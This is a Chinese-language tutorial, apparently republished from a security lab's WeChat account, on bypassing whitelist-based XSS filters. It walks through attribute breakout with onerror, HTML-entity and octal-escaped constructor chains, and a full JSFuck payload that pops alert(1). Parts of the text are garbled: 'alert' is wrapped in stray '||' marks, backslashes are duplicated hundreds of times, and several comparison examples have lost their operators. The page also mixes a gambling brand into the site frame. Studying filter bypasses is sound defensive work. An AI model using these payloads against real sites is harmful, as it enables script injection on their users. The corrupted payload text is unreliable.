工控安全实验室 安全报告 政策标准 深度视点

伟德betvictor

很多白帽子在挖掘XSS漏洞的时候,往往会遇到一个问题,就是明明发现这里的过滤有缺陷,但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维,往往只会反复的去尝试各种不同 payload代码,寄希望于其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下,往往只能是竹篮打水一场空。

鉴于这种情况,这里主要分3个章节来简单的分享一些XSS绕过思路。


【第一节】 白名单限制绕过

【第二节】 黑名单限制绕过

【第三节】 长度限制绕过

本次主要说的是【第一节】白名单限制绕过的情况

所谓的白名单,就是指允许某些字符输入,其他一概拒绝,相对黑名单策略,白名单更加安全。

这里直入正题,说说以下几种可能存在XSS的情况。


一、输出在html标签之间

这种只要以白名单的方式,过滤了>< 直接无解,这里就直接略过了。

二、输出在html属性里

这种情况的主要有两种利用方法。

>>>> 2.1 第一种,是利用><闭合前面的标签,利用html的解析优先级,来逃出引号的限制,实现XSS的构造。

比如 <img src="xxx"> 这种情况,可以用下面的代码形成xss

<img src=""><img src=x onerror=||alert||(1)>">

这种方法比较简单,也比较常见,先用引号和>闭合掉标签,然后再构造。如果这时候,引号被白名单过滤掉了,那么在某种情况下,也可以利用html解析的优先级进行绕过,比如:

<title><img src="xxx"></title>可以用下面的代码形成xss

<title><img src="</title><img src=x onerror=||alert||(1)>"></title>

在浏览器里,会优先解析title标签,这样就成功跳出了引号的限制,形成XSS




>>>> 2.2第二种,就是利用闭合属性,跳出引号,再构造新的属性,形成xss

比如 <img src="xxx"> 这种情况,src内容可控,可以用下面的代码形成xss

<img src="x" onerror="||alert||(1)">

如果说这里白名单过滤掉了引号,其实某种情况下,还可以利用html实体编码进行绕过。比如<img src="x" onerror="yyy"> 然后onerror属性可控,但是白名单又将所有字母括号给直接过滤掉,这时候不能直接写||alert||(1),但是由于在html标签的属性里,就可以用下面的编码进行绕过。

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; ">

所以上述的这些情况,大部分时候,防御策略只需要在白名单中避免存在'"><& 这些特殊字符就可以了。

三、输出在js代码中

这个是本次重点讲的一个点,由于在js中,代码的变化形式比较多样,这里我大概提2个点。

>>>> 3.1 比如某处白名单策略,只允许使用[]$='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\()+这些字符以及数字0-9,连任意字母都不允许使用。那么这种情况下,即使知道这里可能有XSS,要怎么样构造利用呢?

这里给出一个思路。

先说说js中的constructor的用法,constructor 属性返回对创建此对象的数组函数的引用。

语法,Object.constructor

然后这里Object.constructor===Function这是恒等的关系。你可以在控制台试试,会返回true



所以我们可以使用以下方式创建,并执行一个函数:

new Function("||alert||(1)")();

也可以不要new关键字,那么就是

Function("||alert||(1)")()

然后可以将Function转换下,这里"..."是一个任意字符串,也可以为空,然后"...".substr就是一个Object,所以这代码和上面是等效的。

"...".substr.constructor("||alert||(1)")()




再转换下,对象可以写成中括号的形式,比如a.b可以写成a['b']这样子。

"..."["substr"]["constructor"]("||alert||(1)")()

然后对字符串进行变形,任意字符串js中都可以写成\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\+ASCII码的8位形式,也就是查询到字母的ASCII码然后将其转换为8进制时候的结果。

"..."["\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\165\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\142\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162"]["\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\156\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\165\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162"]("\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\141\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\154\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\145\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\50\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\61\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\51")()



 


好了,这样就可以不用任何字母执行一段js代码了。

也可以这样。

new Function("||alert||(1)")();

等价于

[].constructor.constructor('||alert||(1)')()

等价于

[]['constructor']['constructor']('||alert||(1)')()

赋值个变量,缩短下代码,等价于

[][$='constructor'][$]('||alert||(1)')()

然后替换下所有字符串,等价于

[][$='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\156\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\165\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162'][$]('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\141\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\154\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\145\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164(1)')()




哈哈,好像比上面的还要短点。

>>>> 3.2 这里可能有人就要说了,你这就是利用了任意字符串js中都可以写成\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\+ASCII码的8位形式,那我直接在把\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\和数字也白名单过滤了不就行了么,其实还是可以的,看下面代码 

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

复制这段代码,放到浏览器控制台执行,可以看到弹1了,是不是很神奇,其实这段代码就是||alert||(1)在经过了N次变形的结果。

 



然后由于代码只用到了[]+!()6个字符而已,这个写法有个专业的名称,叫做jsfuck

只是看这一堆代码,谁也不知道这是啥意思,也不知道是怎么来的,为啥就会执行||alert||(1),所以下面来给解释下原理。

[]等于创建了一个array对象,也就是一个数组,然后![]是取反,控制台直接执行这个会看到,返回了false。那么!![]也就是对false取反,会返回true

 

下来再说一个知识,在js中等于关系有两种,==叫做等于,===叫做恒等。区别是这样,恒等的一定满足等于,但是反之则不一定成立。

1+1===2true1"1"==的关系false0"0"[]也是==的关系,还有像[]""0false也是==的关系,但是注意"0"""不是==的关系额。悄悄的再告诉你,[]![]也是==的关系额,具体为什么,有兴趣的话可以百度了解下。


还有个知识,就是字符串和数字相加,数字会自动转换为字符串类型,返回的结果会是字符串。字符串和数字相减,字符串会转换为数字类型,返回的会是数字。


还有一些特殊的,不是字符串也不是数字的时候,像true+true返回2true+false会返回1

所以 +true 的结果是1+false的结果是0。在结合上面说到的,这样+!![]表示的就是1+![]表示的就是0了。

http://mmbiz.qpic.cn/mmbiz_png/vEkwp3V9UttSDYgWd10CtSZxEEV3a3Af9J6IgPMWbaOweln0B5iak9icsImde5njFVpFjau6OlXbeelYMpebgyaQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1

 

原理就是这样子,然后因为||alert||(1)可以写成,[]['constructor']['constructor']('||alert||(1)')() ,所以只需要将关键字constructor||alert||(1)对应的jsfuck对应的表达形式构造出来,在进行连接就可以了。由于不能用引号,所以这里引号也必须重新构造。

这里直接给出构造思路。那就是利用字符串的可以直接用下标进行读取的特性,比如字符串'abcd',那么'abcd'[2]就会返回'c'

所以a怎么获取呢,因为![]代表的是fasle,所以![][1]就是'a',然后再将这里的1替换掉,就是![][+!![]],这时候你去试试会发现怎么返回的是true不是'a'啊。那是因为这里的![]不是字符串,所以需要将其先转换为字符串,很简单这样就可以了,前面提到过像[]""0false也是==的关系,那么(![]+[])[+!![]] 控制台直接输入代码就可以看到效果。

 


其他的关键字的字符也都是这么慢慢转换过来的。这里就不在一一列举了,感兴趣的可以看这里有详细的构造思路。http://github.com/aemkei/jsfuck

这里再提供个jsfuck的代码生成工具:

http://www.bugku.com/tools/jsfuck/

文章其实主要是探讨的绕过思路,并不会覆盖所有的XSS漏洞场景去一一列举。作者认为对于XSS绕过这个问题上,思路还是比较重要的。相比很多人喜欢收集一堆payload,然后一个个的去反复尝试,其实了解了这些payload的构造思路的话,往往只需要测试一些特殊字符,就大概心里有数了。

是不是看的意犹未尽?关注公众号,后续会陆续带来

【第二节】 黑名单限制绕过

【第三节】 长度限制绕过

以及更多的精彩内容。


ISASecure CRT Tool认证
等保建设服务资质
信息系统安全集成服务资质
信息安全服务风险评估资质
ISO9001质量管理体系认证
ISO20000技术服务管理体系认证
ISO27001信息安全管理体系认证
信息安全服务资质安全工程类一级
信息安全服务资质安全开发类一级
微信二维码
在线咨询
周一至周日 0:00-24:00
4000-680-620
伟德betvictorCopyright2016 伟德国际手机客户端 All Rights Reserved 版权所有 京ICP备14062383号-1
站长统计
Baidu
sogou